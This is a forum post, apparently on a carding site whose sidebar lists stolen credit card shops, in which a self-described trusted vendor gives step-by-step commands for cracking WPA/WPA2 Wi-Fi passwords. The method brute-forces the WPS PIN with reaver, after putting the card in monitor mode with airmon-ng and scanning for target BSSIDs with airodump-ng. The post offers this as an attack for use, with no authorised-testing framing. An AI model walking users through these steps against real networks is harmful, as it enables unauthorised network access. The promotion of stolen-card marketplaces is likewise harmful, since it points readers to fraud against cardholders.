Welcome!

By registering with us, you'll be able to discuss, share and private message with other members of our community.

SignUp Now!
Money Club cc shop
Savastan0
adv ex on 22 February 2024
DarkHIve
Patrick Stash
Blackstash cc shop
Trump cc shop
Wizard's shop 2.0
Luki Crown
Kfc Club
banner Expire 10 May 2025
banner expire at 13 August 2024
adv exp at 10 October
BidenCash Shop
adv ex on 22 February 2024
banner Expire 25 April 2025
Yale lodge shop
UniCvv

Premiums

TRUSTED VENDOR
Joined
Dec 5, 2020
Messages
3,049
Open the terminal
CTRL+ALT+T
And type

apt-get install reaver

After installing this
Install dependencies

apt-get install libpcap-dev

THEN
apt-get install libsqlite3-dev

Hacking WPA/WPA2 Wireless
Requirements:

Install aircrack-ng by typing

apt-get install aircrack-ng

We need to have the wireless BSSID (Mac address) so we use airodump-ng
Open a terminal and Type:

airmon-ng start wlan0 ZERO NOT O
Then type

airodump-ng mon0 ZERO NOT O

It will lists the available wireless passwords, now copy the BSSID of the Access Point ( e.g : 00:11:28:32:49:55 )
Starting the attack type

reaver -i mon0 -b 00:11:28:32:49:55

Now it will start testing bruteforcing the PIN number of the vulnerability WPS (which we have spoke about it), and it will show you the WPA/WPA2 Password in the end of the Crack.
 
Top Bottom